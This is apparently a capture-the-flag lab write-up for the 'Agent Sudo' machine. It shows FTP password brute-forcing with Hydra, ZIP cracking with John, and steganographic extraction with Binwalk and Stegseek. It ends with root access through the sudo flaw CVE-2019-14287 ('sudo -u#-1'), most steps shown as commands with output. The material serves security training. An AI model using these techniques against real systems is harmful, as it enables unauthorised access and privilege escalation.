Skip to main content

Agent SUDO

HYDRA

  • We were able to Brute-Force the credentials of the User: chris
  • Brute-Forcing FTP: crystal
[DATA] attacking ftp://10.10.2.168:21/
[21][ftp] host: 10.10.2.168   login: chris   password: crystal

FTP

  • We can Login as: chris:crystal
  • To_agentJ.txt Note states that there is a Hidden Password inside one of the Images [cute-alien.jpg - cutie.png].
  • We can Download this Images and examine them further using Binwalk - Stegseek
Connected to 10.10.2.168.
220 (vsFTPd 3.0.3)
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
ftp> get To_agentJ.txt -
Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. 
Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From,
Agent C

ftp> mget cute-alien.jpg cutie.png

BINWALK - JOHN

We can View & Extract Hidden contents found during FTP Enumeration using Binwalk.

  • Hidden ZIP Inside [cutie.png]
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

  • The Extracted ZIP is Password Protected. We can use John to Brute-Force the File.
  • Password: alien
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
alien            (Agent.zip/To_agentR.txt)

  • Opening the ZIP we find a Note from: Agent: R to Agent: C. There is also the Text which is Base64 Encoded.
  • Encoded Text: QXJlYTUx ➜ Area51
Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By,
Agent R

STEGSEEK

  • Hidden Text inside [cute-alien.jpg] we can use Stegseek to Brute-Force - Extract File Contents, or we can use the previous decoded Base64 Text which is the Password.
  • Password: Area51
[i] Found passphrase: "Area51"
[i] Original filename: "message.txt".
[i] Extracting to "cute-alien.jpg.out".

Hi 'james',
Glad you find this message. Your login password is 'hackerrules!'
Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris
  • There are Credentials Inside message.txt
  • SSH Credentials: james:hackerrules!

Privilege Escalation

  • Using SSH Credentials to Login: james:hackerrules!
james@agent-sudo: ~$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

  • CVE-2019-14287
  • In SUDO Version Before 1.8.28, an Attacker with access to a Runas ALL SUDOER Account can Bypass certain Policy Blacklists and Session PAM Modules, and can cause incorrect Logging, by invoking SUDO with a crafted User ID.
james@agent-sudo: ~$ sudo -l
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
james@agent-sudo: ~$
james@agent-sudo: ~$ sudo -V
Sudo version 1.8.21.p2 
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

  • Invoking SUDO with crafted User ID
james@agent-sudo: ~$ sudo -u#-1 /bin/bash
root@agent-sudo: ~$ id 
uid=0(root) gid=1000(james) groups=1000(james)
root@agent-sudo: whoami
root